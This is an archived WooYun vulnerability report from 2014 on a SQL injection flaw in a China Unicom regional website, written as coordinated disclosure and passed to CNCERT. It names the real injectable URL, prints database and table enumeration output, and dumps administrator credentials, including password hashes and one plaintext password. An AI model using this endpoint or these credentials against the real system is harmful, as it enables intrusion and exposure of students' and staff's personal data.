当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061662

漏洞标题:中国联通某地区分站SQL注入致大量用户信息泄漏

相关厂商:中国联通

漏洞作者: PythonPig

提交时间:2014-05-23 19:43

修复时间:2014-07-07 19:43

公开时间:2014-07-07 19:43

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-23: 细节已通知厂商并且等待厂商处理中
2014-05-28: 厂商已经确认,细节仅向厂商公开
2014-06-07: 细节向核心白帽子及相关领域专家公开
2014-06-17: 细节向普通白帽子公开
2014-06-27: 细节向实习白帽子公开
2014-07-07: 细节向公众公开

简要描述:

中国联通某站存在sql注入
用户信息漏洞~~数量不少
听说联通的漏洞给的rank都不高~~这是为什么勒~?

详细说明:

管理员的用户名密码什么的就不说了,教师的姓名电话密码什么的也不说了,但是一个省的学生的姓名电话 !成绩! 不能不管了,这些学生是祖国的未来,不是嘛?
0x01:先把注入点拿出来:http://202.100.98.9/view.php?db=dongtai&id=5 id存在注入

1副本.jpg

这个站肯定还有别的注入点,好好排查吧
0x02:来看看数据库:

available databases [10]:
[*] information_schema
[*] jxt_blog
[*] moodle
[*] mysql
[*] oscommerce
[*] sms
[*] test
[*] vtigercrm520
[*] vtigercrm530
[*] wbrick


0x03:再来看看表吧,有很多呢~~

Database: vtigercrm520
[447 tables]
+-------------------------------------------+
| com_vtiger_workflow_activatedonce |
| com_vtiger_workflows |
| com_vtiger_workflows_seq |
| com_vtiger_workflowtask_queue |
| com_vtiger_workflowtasks |
| com_vtiger_workflowtasks_entitymethod |
| com_vtiger_workflowtasks_entitymethod_seq |
| com_vtiger_workflowtasks_seq |
| com_vtiger_workflowtemplates |
| vtiger_account |
| vtiger_accountbillads |
| vtiger_accountdepstatus |
| vtiger_accountownership |
| vtiger_accountrating |
| vtiger_accountregion |
| vtiger_accountscf |
| vtiger_accountshipads |
| vtiger_accounttype |
| vtiger_accounttype_seq |
| vtiger_actionmapping |
| vtiger_activity |
| vtiger_activity_reminder |
| vtiger_activity_reminder_popup |
| vtiger_activity_view |
| vtiger_activity_view_seq |
| vtiger_activitycf |
| vtiger_activityproductrel |
| vtiger_activitytype |
| vtiger_activitytype_seq |
| vtiger_activsubtype |
| vtiger_announcement |
| vtiger_assets |
| vtiger_assetscf |
| vtiger_assetstatus |
| vtiger_assetstatus_seq |
| vtiger_asterisk |
| vtiger_asteriskextensions |
| vtiger_asteriskincomingcalls |
| vtiger_asteriskincomingevents |
| vtiger_attachments |
| vtiger_attachmentsfolder |
| vtiger_attachmentsfolder_seq |
| vtiger_audit_trial |
| vtiger_blocks |
| vtiger_blocks_seq |
| vtiger_businesstype |
| vtiger_campaign |
| vtiger_campaignaccountrel |
| vtiger_campaigncontrel |
| vtiger_campaignleadrel |
| vtiger_campaignrelstatus |
| vtiger_campaignrelstatus_seq |
| vtiger_campaignscf |
| vtiger_campaignstatus |
| vtiger_campaignstatus_seq |
| vtiger_campaigntype |
| vtiger_campaigntype_seq |
| vtiger_carrier |
| vtiger_carrier_seq |
| vtiger_chat_msg |
| vtiger_chat_pchat |
| vtiger_chat_pvchat |
| vtiger_chat_users |
| vtiger_cntactivityrel |
| vtiger_competitor |
| vtiger_contactaddress |
| vtiger_contactdetails |
| vtiger_contactscf |
| vtiger_contactsubdetails |
| vtiger_contacttype |
| vtiger_contpotentialrel |
| vtiger_contract_priority |
| vtiger_contract_priority_seq |
| vtiger_contract_status |
| vtiger_contract_status_seq |
| vtiger_contract_type |
| vtiger_contract_type_seq |
| vtiger_convertleadmapping |
| vtiger_crmentity |
| vtiger_crmentity_seq |
| vtiger_crmentitynotesrel |
| vtiger_crmentityrel |
| vtiger_currencies |
| vtiger_currencies_seq |
| vtiger_currency |
| vtiger_currency_info |
| vtiger_currency_info_seq |
| vtiger_customaction |
| vtiger_customerdetails |
| vtiger_customerportal_fields |
| vtiger_customerportal_prefs |
| vtiger_customerportal_tabs |
| vtiger_customview |
| vtiger_customview_seq |
| vtiger_cvadvfilter |
| vtiger_cvcolumnlist |
| vtiger_cvstdfilter |
| vtiger_datashare_grp2grp |
| vtiger_datashare_grp2role |
| vtiger_datashare_grp2rs |
| vtiger_datashare_module_rel |
| vtiger_datashare_relatedmodule_permission |
| vtiger_datashare_relatedmodules |
| vtiger_datashare_relatedmodules_seq |
| vtiger_datashare_role2group |
| vtiger_datashare_role2role |
| vtiger_datashare_role2rs |
| vtiger_datashare_rs2grp |
| vtiger_datashare_rs2role |
| vtiger_datashare_rs2rs |
| vtiger_date_format |
| vtiger_date_format_seq |
| vtiger_dealintimation |
| vtiger_def_org_field |
| vtiger_def_org_share |
| vtiger_def_org_share_seq |
| vtiger_defaultcv |
| vtiger_downloadpurpose |
| vtiger_duration_minutes |
| vtiger_duration_minutes_seq |
| vtiger_durationhrs |
| vtiger_durationmins |
| vtiger_email_access |
| vtiger_email_track |
| vtiger_emaildetails |
| vtiger_emailtemplates |
| vtiger_emailtemplates_seq |
| vtiger_entityname |
| vtiger_evaluationstatus |
| vtiger_eventhandler_module |
| vtiger_eventhandler_module_seq |
| vtiger_eventhandlers |
| vtiger_eventhandlers_seq |
| vtiger_eventstatus |
| vtiger_eventstatus_seq |
| vtiger_expectedresponse |
| vtiger_expectedresponse_seq |
| vtiger_faq |
| vtiger_faqcategories |
| vtiger_faqcategories_seq |
| vtiger_faqcomments |
| vtiger_faqstatus |
| vtiger_faqstatus_seq |
| vtiger_field |
| vtiger_field_seq |
| vtiger_fieldformulas |
| vtiger_fieldmodulerel |
| vtiger_files |
| vtiger_freetagged_objects |
| vtiger_freetags |
| vtiger_freetags_seq |
| vtiger_glacct |
| vtiger_glacct_seq |
| vtiger_group2grouprel |
| vtiger_group2role |
| vtiger_group2rs |
| vtiger_groups |
| vtiger_headers |
| vtiger_home_layout |
| vtiger_homedashbd |
| vtiger_homedefault |
| vtiger_homemodule |
| vtiger_homemoduleflds |
| vtiger_homerss |
| vtiger_homestuff |
| vtiger_homestuff_seq |
| vtiger_import_maps |
| vtiger_industry |
| vtiger_industry_seq |
| vtiger_inventory_tandc |
| vtiger_inventory_tandc_seq |
| vtiger_inventorynotification |
| vtiger_inventorynotification_seq |
| vtiger_inventoryproductrel |
| vtiger_inventoryshippingrel |
| vtiger_inventorysubproductrel |
| vtiger_inventorytaxinfo |
| vtiger_inventorytaxinfo_seq |
| vtiger_invitees |
| vtiger_invoice |
| vtiger_invoice_recurring_info |
| vtiger_invoicebillads |
| vtiger_invoicecf |
| vtiger_invoiceshipads |
| vtiger_invoicestatus |
| vtiger_invoicestatus_seq |
| vtiger_invoicestatushistory |
| vtiger_language |
| vtiger_language_seq |
| vtiger_lar |
| vtiger_lead_view |
| vtiger_lead_view_seq |
| vtiger_leadacctrel |
| vtiger_leadaddress |
| vtiger_leadcontrel |
| vtiger_leaddetails |
| vtiger_leadpotrel |
| vtiger_leadscf |
| vtiger_leadsource |
| vtiger_leadsource_seq |
| vtiger_leadstage |
| vtiger_leadstatus |
| vtiger_leadstatus_seq |
| vtiger_leadsubdetails |
| vtiger_licencekeystatus |
| vtiger_links |
| vtiger_links_seq |
| vtiger_loginhistory |
| vtiger_mail_accounts |
| vtiger_mailmanager_mailattachments |
| vtiger_mailmanager_mailrecord |
| vtiger_mailmanager_mailrel |
| vtiger_mailscanner |
| vtiger_mailscanner_actions |
| vtiger_mailscanner_folders |
| vtiger_mailscanner_ids |
| vtiger_mailscanner_ruleactions |
| vtiger_mailscanner_rules |
| vtiger_manufacturer |
| vtiger_manufacturer_seq |
| vtiger_mobile_alerts |
| vtiger_modcomments |
| vtiger_modcommentscf |
| vtiger_modentity_num |
| vtiger_modentity_num_seq |
| vtiger_moduleowners |
| vtiger_notebook_contents |
| vtiger_notes |
| vtiger_notescf |
| vtiger_notificationscheduler |
| vtiger_notificationscheduler_seq |
| vtiger_opportunity_type |
| vtiger_opportunity_type_seq |
| vtiger_opportunitystage |
| vtiger_org_share_action2tab |
| vtiger_org_share_action_mapping |
| vtiger_organizationdetails |
| vtiger_ownernotify |
| vtiger_parenttab |
| vtiger_parenttabrel |
| vtiger_payment_duration |
| vtiger_payment_duration_seq |
| vtiger_pbxmanager |
| vtiger_picklist |
| vtiger_picklist_seq |
| vtiger_picklistvalues_seq |
| vtiger_pobillads |
| vtiger_portal |
| vtiger_portalinfo |
| vtiger_poshipads |
| vtiger_postatus |
| vtiger_postatus_seq |
| vtiger_postatushistory |
| vtiger_potcompetitorrel |
| vtiger_potential |
| vtiger_potentialscf |
| vtiger_potstagehistory |
| vtiger_pricebook |
| vtiger_pricebookcf |
| vtiger_pricebookproductrel |
| vtiger_priority |
| vtiger_productcategory |
| vtiger_productcategory_seq |
| vtiger_productcf |
| vtiger_productcollaterals |
| vtiger_productcurrencyrel |
| vtiger_products |
| vtiger_producttaxrel |
| vtiger_profile |
| vtiger_profile2field |
| vtiger_profile2globalpermissions |
| vtiger_profile2standardpermissions |
| vtiger_profile2tab |
| vtiger_profile2utility |
| vtiger_profile_seq |
| vtiger_progress |
| vtiger_progress_seq |
| vtiger_project |
| vtiger_projectcf |
| vtiger_projectmilestone |
| vtiger_projectmilestonecf |
| vtiger_projectmilestonetype |
| vtiger_projectmilestonetype_seq |
| vtiger_projectpriority |
| vtiger_projectpriority_seq |
| vtiger_projectstatus |
| vtiger_projectstatus_seq |
| vtiger_projecttask |
| vtiger_projecttaskcf |
| vtiger_projecttaskpriority |
| vtiger_projecttaskpriority_seq |
| vtiger_projecttaskprogress |
| vtiger_projecttaskprogress_seq |
| vtiger_projecttasktype |
| vtiger_projecttasktype_seq |
| vtiger_projecttype |
| vtiger_projecttype_seq |
| vtiger_purchaseorder |
| vtiger_purchaseordercf |
| vtiger_quickview |
| vtiger_quotes |
| vtiger_quotesbillads |
| vtiger_quotescf |
| vtiger_quotesshipads |
| vtiger_quotestage |
| vtiger_quotestage_seq |
| vtiger_quotestagehistory |
| vtiger_rating |
| vtiger_rating_seq |
| vtiger_recurring_frequency |
| vtiger_recurring_frequency_seq |
| vtiger_recurringevents |
| vtiger_recurringtype |
| vtiger_recurringtype_seq |
| vtiger_relatedlists |
| vtiger_relatedlists_rb |
| vtiger_relatedlists_seq |
| vtiger_relcriteria |
| vtiger_relcriteria_grouping |
| vtiger_reminder_interval |
| vtiger_reminder_interval_seq |
| vtiger_report |
| vtiger_reportdatefilter |
| vtiger_reportfilters |
| vtiger_reportfolder |
| vtiger_reportmodules |
| vtiger_reportsharing |
| vtiger_reportsortcol |
| vtiger_reportsummary |
| vtiger_revenuetype |
| vtiger_role |
| vtiger_role2picklist |
| vtiger_role2profile |
| vtiger_role_seq |
| vtiger_rss |
| vtiger_sales_stage |
| vtiger_sales_stage_seq |
| vtiger_salesmanactivityrel |
| vtiger_salesmanattachmentsrel |
| vtiger_salesmanticketrel |
| vtiger_salesorder |
| vtiger_salesordercf |
| vtiger_salutationtype |
| vtiger_salutationtype_seq |
| vtiger_seactivityrel |
| vtiger_seactivityrel_seq |
| vtiger_seattachmentsrel |
| vtiger_selectcolumn |
| vtiger_selectquery |
| vtiger_selectquery_seq |
| vtiger_senotesrel |
| vtiger_seproductsrel |
| vtiger_service |
| vtiger_service_usageunit |
| vtiger_service_usageunit_seq |
| vtiger_servicecategory |
| vtiger_servicecategory_seq |
| vtiger_servicecf |
| vtiger_servicecontracts |
| vtiger_servicecontractscf |
| vtiger_seticketsrel |
| vtiger_settings_blocks |
| vtiger_settings_blocks_seq |
| vtiger_settings_field |
| vtiger_settings_field_seq |
| vtiger_sharedcalendar |
| vtiger_shippingtaxinfo |
| vtiger_shippingtaxinfo_seq |
| vtiger_smsnotifier |
| vtiger_smsnotifier_servers |
| vtiger_smsnotifier_status |
| vtiger_smsnotifiercf |
| vtiger_soapservice |
| vtiger_sobillads |
| vtiger_soshipads |
| vtiger_sostatus |
| vtiger_sostatus_seq |
| vtiger_sostatushistory |
| vtiger_status |
| vtiger_status_seq |
| vtiger_systems |
| vtiger_tab |
| vtiger_tab_info |
| vtiger_taskpriority |
| vtiger_taskpriority_seq |
| vtiger_taskstatus |
| vtiger_taskstatus_seq |
| vtiger_taxclass |
| vtiger_taxclass_seq |
| vtiger_ticketcategories |
| vtiger_ticketcategories_seq |
| vtiger_ticketcf |
| vtiger_ticketcomments |
| vtiger_ticketpriorities |
| vtiger_ticketpriorities_seq |
| vtiger_ticketseverities |
| vtiger_ticketseverities_seq |
| vtiger_ticketstatus |
| vtiger_ticketstatus_seq |
| vtiger_ticketstracktime |
| vtiger_tmp_read_group_rel_sharing_per |
| vtiger_tmp_read_group_sharing_per |
| vtiger_tmp_read_user_rel_sharing_per |
| vtiger_tmp_read_user_sharing_per |
| vtiger_tmp_write_group_rel_sharing_per |
| vtiger_tmp_write_group_sharing_per |
| vtiger_tmp_write_user_rel_sharing_per |
| vtiger_tmp_write_user_sharing_per |
| vtiger_tracker |
| vtiger_tracking_unit |
| vtiger_tracking_unit_seq |
| vtiger_troubletickets |
| vtiger_usageunit |
| vtiger_usageunit_seq |
| vtiger_user2mergefields |
| vtiger_user2role |
| vtiger_user_module_preferences |
| vtiger_users |
| vtiger_users2group |
| vtiger_users_last_import |
| vtiger_users_seq |
| vtiger_usertype |
| vtiger_vendor |
| vtiger_vendorcf |
| vtiger_vendorcontactrel |
| vtiger_version |
| vtiger_version_seq |
| vtiger_visibility |
| vtiger_visibility_seq |
| vtiger_wordtemplates |
| vtiger_ws_entity |
| vtiger_ws_entity_fieldtype |
| vtiger_ws_entity_fieldtype_seq |
| vtiger_ws_entity_name |
| vtiger_ws_entity_referencetype |
| vtiger_ws_entity_seq |
| vtiger_ws_entity_tables |
| vtiger_ws_fieldtype |
| vtiger_ws_operation |
| vtiger_ws_operation_parameters |
| vtiger_ws_operation_seq |
| vtiger_ws_referencetype |
| vtiger_ws_userauthtoken |
| vtiger_wsapp |
| vtiger_wsapp_handlerdetails |
| vtiger_wsapp_queuerecords |
| vtiger_wsapp_recordmapping |
+-------------------------------------------+


Database: oscommerce
[50 tables]
+---------------------------------------------+
| action_recorder |
| address_book |
| address_format |
| administrators |
| banners |
| banners_history |
| categories |
| categories_description |
| configuration |
| configuration_group |
| counter |
| counter_history |
| countries |
| currencies |
| customers |
| customers_basket |
| customers_basket_attributes |
| customers_info |
| geo_zones |
| languages |
| manufacturers |
| manufacturers_info |
| newsletters |
| orders |
| orders_products |
| orders_products_attributes |
| orders_products_download |
| orders_status |
| orders_status_history |
| orders_total |
| products |
| products_attributes |
| products_attributes_download |
| products_description |
| products_images |
| products_notifications |
| products_options |
| products_options_values |
| products_options_values_to_products_options |
| products_to_categories |
| reviews |
| reviews_description |
| sec_directory_whitelist |
| sessions |
| specials |
| tax_class |
| tax_rates |
| whos_online |
| zones |
| zones_to_geo_zones |
+---------------------------------------------+


Database: jxt_blog
[20 tables]
+--------------------------------+
| jxt_nucleus_actionlog |
| jxt_nucleus_activation |
| jxt_nucleus_ban |
| jxt_nucleus_blog |
| jxt_nucleus_category |
| jxt_nucleus_comment |
| jxt_nucleus_config |
| jxt_nucleus_item |
| jxt_nucleus_karma |
| jxt_nucleus_member |
| jxt_nucleus_plugin |
| jxt_nucleus_plugin_event |
| jxt_nucleus_plugin_option |
| jxt_nucleus_plugin_option_desc |
| jxt_nucleus_skin |
| jxt_nucleus_skin_desc |
| jxt_nucleus_team |
| jxt_nucleus_template |
| jxt_nucleus_template_desc |
| jxt_nucleus_tickets |
+--------------------------------+


0x04:再来看看管理员们吧

Table: administrators
[1 entry]
+----+-----------+------------------------------------+
| id | user_name | user_password |
+----+-----------+------------------------------------+
| 1 | admin | $P$DwG9Szvlf7pcTXpfMz5sL6RamdMzar/ |
+----+-----------+------------------------------------+


Database: oscommerce
Table: administrators
[1 entry]
+----+-----------+------------------------------------+
| id | user_name | user_password |
+----+-----------+------------------------------------+
| 1 | admin | $P$DwG9Szvlf7pcTXpfMz5sL6RamdMzar/ |
+----+-----------+------------------------------------+

ad_admin
[1 entry]
+----+--------+----------+
| id | user | password |
+----+--------+----------+
| 1 | wbrick | wbrick |
+----+--------+----------+

Database: sms
Table: oecms_admin
[1 entry]
+---------+----------------------------------+-----------+
| adminid | password | adminname |
+---------+----------------------------------+-----------+
| 1 | ae68761b5b545085e794d49979e72ca8 | lyt |
+---------+----------------------------------+-----------+


0x05:最后来来漏洞的用户数据:

2改.jpg

漏洞证明:

见上

修复方案:

过滤
信息泄漏无小事,希望认真对待
一个省这么多学生的姓名、电话、各科成绩……都可随便查看,不算个小问题
1万多个表,数据量也不算小
管理员的用户名密码什么的,教师的姓名电话密码什么的
联通的漏洞为什么给的rank都很少呢?

版权声明:转载请注明来源 PythonPig@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-05-28 10:21

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给宁夏分中心处置。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-05-23 21:13 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    因为是转cncert处理的,虽然不高也不会太低..

  2. 2014-05-26 13:52 | PythonPig ( 普通白帽子 | Rank:491 漏洞数:71 | 只会简单工具的小小菜)

    @魇 前面提了一个联通的,直接被cncert忽略了,也不给个说法~~

  3. 2014-05-28 11:21 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @PythonPig 想想cnvd忽略我两个前台漏洞,我就想打他一顿

  4. 2014-05-28 11:54 | PythonPig ( 普通白帽子 | Rank:491 漏洞数:71 | 只会简单工具的小小菜)

    @Mosuan 是啊,不知道cnvd为什么会忽略,然后再下发给相关单位处理~~

  5. 2014-07-07 21:36 | 阿萨帝 ( 实习白帽子 | Rank:91 漏洞数:68 | 不发礼物的索要联系方式都是耍流氓。)

    这是什么工具?

  6. 2014-07-07 23:04 | 我是白帽子 ( 路人 | Rank:10 漏洞数:1 | 我是白帽子)

    @阿萨帝 sqlmap